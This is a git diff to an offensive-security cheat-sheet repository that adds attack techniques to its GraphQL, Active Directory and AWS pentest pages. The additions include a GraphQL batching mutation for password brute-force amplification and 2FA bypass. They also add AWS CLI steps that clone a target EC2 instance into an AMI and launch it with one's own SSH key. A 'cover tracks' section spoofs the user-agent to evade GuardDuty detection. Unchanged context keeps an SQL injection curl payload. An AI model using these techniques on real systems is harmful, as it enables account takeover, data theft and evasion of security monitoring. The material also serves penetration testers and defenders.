diff --git a/GraphQL Injection/README.md b/GraphQL Injection/README.md index b192960c..3a9883b9 100644 --- a/GraphQL Injection/README.md +++ b/GraphQL Injection/README.md @@ -16,6 +16,7 @@ * [Use mutations](#use-mutations) * [NOSQL injection](#nosql-injection) * [SQL injection](#sql-injection) + * [GraphQL Batching Attacks](#graphql-batching-attacks) * [References](#references) ## Tools @@ -240,6 +241,37 @@ Simple SQL injection inside a graphql field. curl -X POST http://localhost:8080/graphql\?embedded_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(30\)%3B--%27 ``` +### GraphQL Batching Attacks + +Common scenario: +* Password Brute-force Amplification Scenario +* 2FA bypassing + +```powershell +mutation finishChannelVerificationMutation( + $input FinishChannelVerificationInput!, + $input2 FinishChannelVerificationInput!, + $input3 FinishChannelVerificationInput!, +){ + first: finishChannelVerificationMutation(input: $input){ + channel{ + id + option{ + ... onChannelSmsOptions{ + number + } + } + status + notificationSubscription(last: 1000){ etc... } + } + } + + + second: finishChannelVerificationMutation(input: $input2){...} + third: finishChannelVerificationMutation(input: $input3){...} +} +``` + ## References @@ -256,4 +288,5 @@ curl -X POST http://localhost:8080/graphql\?embedded_submission_form_uuid\=1%27% * [GraphQL cheatsheet - DEVHINTS.IO](https://devhints.io/graphql) * [HIP19 Writeup - Meet Your Doctor 1,2,3 - June 22, 2019 - Swissky](https://swisskyrepo.github.io/HIP19-MeetYourDoctor/) * [Introspection query leaks sensitive graphql system information - @Zuriel](https://hackerone.com/reports/291531) -* [Graphql Bug to Steal Anyone’s Address - Sept 1, 2019 - Pratik Yadav](https://medium.com/@pratiky054/graphql-bug-to-steal-anyones-address-fc34f0374417) \ No newline at end of file +* [Graphql Bug to Steal Anyone’s Address - Sept 1, 2019 - Pratik Yadav](https://medium.com/@pratiky054/graphql-bug-to-steal-anyones-address-fc34f0374417) +* [GraphQL Batching Attack - RENATAWALLARM - DECEMBER 13, 2019](https://lab.wallarm.com/graphql-batching-attack/) \ No newline at end of file diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 066e08e1..395c02f9 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -1102,7 +1102,9 @@ Prerequisite: ### Kerberos Unconstrained Delegation -> The user sends a TGS to access the service, along with their TGT, and then the service can use the user's TGT to request a TGS for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html +> The user sends a TGS to access the service, along with their TGT, and then the service can use the user's TGT to request a TGS for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html + +:warning: Unconstrained delegation used to be the only option available in Windows 2000 Domain Compromise via DC Print Server and Unconstrained Delegation diff --git a/Methodology and Resources/Cloud - AWS Pentest.md b/Methodology and Resources/Cloud - AWS Pentest.md index 50175642..621f19f8 100644 --- a/Methodology and Resources/Cloud - AWS Pentest.md +++ b/Methodology and Resources/Cloud - AWS Pentest.md @@ -1,5 +1,7 @@ # AWS +> Amazon Web Services offers reliable, scalable, and inexpensive cloud computing services. + ## Summary * [Training](#training) @@ -10,7 +12,13 @@ * [Method for Container Service (Fargate)](#method-for-container-service-fargate) * [AWS - Shadow Admin](#aws---shadow-admin) * [Admin equivalent permission](#admin-equivalent-permission) +* [AWS - Mount EBS volume to EC2 Linux](#aws---mount-ebs-volume-to-ec2-linux) +* [AWS - Copy EC2 using AMI Image](#aws---copy-ec2-using-ami-image) * [AWS - Golden SAML Attack](#aws---golden-saml-attack) +* [Cover tracks by obfuscating Cloudtrail logs and Guard Duty](#cover-tracks-by-obfuscating-cloudtrail-logs-and-guard-duty) + * [PenTest:IAMUser/KaliLinux](#) + * [PenTest:IAMUser/ParrotLinux](#) + * [PenTest:IAMUser/PentooLinux](#) * [Security checks](#security-checks) * [References](#references) @@ -307,6 +315,52 @@ Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/me $ aws glue create-dev-endpoint –endpoint-name my_dev_endpoint –role-arn arn_of_glue_service_role –public-key file://path/to/my/public/ssh/key.pub ``` +## AWS - Mount EBS volume to EC2 Linux + +:warning: EBS snapshots are block-level incremental, which means that every snapshot only copies the blocks (or areas) in the volume that had been changed since the last snapshot. To restore your data, you need to create a new EBS volume from one of your EBS snapshots. The new volume will be a duplicate of the initial EBS volume on which the snapshot was taken. + +Step 1: Head over to EC2 –> Volumes and create a new volume of your preferred size and type. +Step 2: Select the created volume, right click and select the "attach volume" option. +Step 3: Select the instance from the instance text box as shown below : `attach ebs volume` + ```powershell + aws ec2 create-volume –snapshot-id snapshot_id --availability-zone zone + aws ec2 attach-volume –-volume-id volume_id –-instance-id instance_id --device device + ``` + +Step 4: Now, login to your ec2 instance and list the available disks using the following command : `lsblk` +Step 5: Check if the volume has any data using the following command : `sudo file -s /dev/xvdf` +Step 6: Format the volume to ext4 filesystem using the following command : `sudo mkfs -t ext4 /dev/xvdf` +Step 7: Create a directory of your choice to mount our new ext4 volume. I am using the name “newvolume” : `sudo mkdir /newvolume` +Step 8: Mount the volume to "newvolume" directory using the following command : `sudo mount /dev/xvdf /newvolume/` +Step 9: cd into newvolume directory and check the disk space for confirming the volume mount : `cd /newvolume; df -h .` + + +## AWS - Copy EC2 using AMI Image + +First you need to extract data about the current instances and their AMI/security groups/subnet : `aws ec2 describe-images --region eu-west-1` + +```powershell +# create a new image for the instance-id +$ aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1 + +# add key to AWS +$ aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1 + +# create ec2 using the previously created AMI, use the same security group and subnet to connect easily. +$ aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1 + +# now you can check the instance +aws ec2 describe-instances --instance-ids i-0546910a0c18725a1 + +# If needed : edit groups +aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01" --region eu-west-1 + +# be a good guy, clean our instance to avoid any useless cost +aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1 +aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1 +``` + + ## AWS - Golden SAML Attack https://www.youtube.com/watch?v=5dj4vOqqGZw @@ -326,6 +380,51 @@ $ python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012 ``` +## Cover tracks by obfuscating Cloudtrail logs and Guard Duty + +:warning: When using awscli on Kali Linux, Pentoo and Parrot Linux, a log is generated based on the user-agent. + +Pacu bypass this problem by defining a custom User-agent (https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu.py#L1473) + +```python +boto3_session = boto3.session.Session() +ua = boto3_session._session.user_agent() +if 'kali' in ua.lower() or 'parrot' in ua.lower() or 'pentoo' in ua.lower(): # If the local OS is Kali/Parrot/Pentoo Linux + # GuardDuty triggers a finding around API calls made from Kali Linux, so let's avoid that... + self.print('Detected environment as one of Kali/Parrot/Pentoo Linux. Modifying user agent to hide that from GuardDuty...') +``` + +### PenTest:IAMUser/KaliLinux + +#### Finding description + +**An API was invoked from a Kali Linux EC2 instance\.** + +This finding informs you that a machine running Kali Linux is making API calls using credentials that belong to your AWS account\. Your credentials might be compromised\. Kali Linux is a popular penetration testing tool that security professionals use to identify weaknesses in EC2 instances that require patching\. Attackers also use this tool to find EC2 configuration weaknesses and gain unauthorized access to your AWS environment\. For more information, see [Remediating Compromised AWS Credentials](guardduty_remediate.md#compromised-creds)\. + +#### Default severity: Medium + +### PenTest:IAMUser/ParrotLinux + +#### Finding description + +**An API was invoked from a Parrot Security Linux EC2 instance\.** + +This finding informs you that a machine running Parrot Security Linux is making API calls using credentials that belong to your AWS account\. Your credentials might be compromised\. Parrot Security Linux is a popular penetration testing tool that security professionals use to identify weaknesses in EC2 instances that require patching\. Attackers also use this tool to find EC2 configuration weaknesses and gain unauthorized access to your AWS environment\. For more information, see [Remediating Compromised AWS Credentials](guardduty_remediate.md#compromised-creds)\. + +#### Default severity: Medium + +### PenTest:IAMUser/PentooLinux + +#### Finding description + +**An API was invoked from a Pentoo Linux EC2 instance\.** + +This finding informs you that a machine running Pentoo Linux is making API calls using credentials that belong to your AWS account\. Your credentials might be compromised\. Pentoo Linux is a popular penetration testing tool that security professionals use to identify weaknesses in EC2 instances that require patching\. Attackers also use this tool to find EC2 configuration weaknesses and gain unauthorized access to your AWS environment\. For more information, see [Remediating Compromised AWS Credentials](guardduty_remediate.md#compromised-creds)\. + +#### Default severity: Medium + + ## Security checks https://github.com/DenizParlak/Zeus @@ -390,4 +489,7 @@ https://github.com/DenizParlak/Zeus * [PACU Spencer Gietzen - 30 juil. 2018](https://www.youtube.com/watch?v=XfetW1Vqybw&feature=youtu.be&list=PLBID4NiuWSmfdWCmYGDQtlPABFHN7HyD5) * [Cloud security instance metadata - PumaScan](https://pumascan.com/resources/cloud-security-instance-metadata/) * [Privilege escalation in the Cloud: From SSRF to Global Account Administrator - Maxime Leblanc - Sep 1, 2018](https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6) -* [AWS - Cheatsheet - @Magnussen](https://www.magnussen.funcmylife.fr/article_35) \ No newline at end of file +* [AWS - Cheatsheet - @Magnussen](https://www.magnussen.funcmylife.fr/article_35) +* [amazon-guardduty-user-guide PenTest Finding Types - @awsdocs](https://github.com/awsdocs/amazon-guardduty-user-guide/blob/master/doc_source/guardduty_pentest.md) +* [HOW I HACKED A WHOLE EC2 NETWORK DURING A PENETRATION TEST - by Federico Fernandez](https://www.secsignal.org/en/news/how-i-hacked-a-whole-ec2-network-during-a-penetration-test/) +* [How to Attach and Mount an EBS volume to EC2 Linux Instance - AUGUST 17, 2016](https://devopscube.com/mount-ebs-volume-ec2-instance/) \ No newline at end of file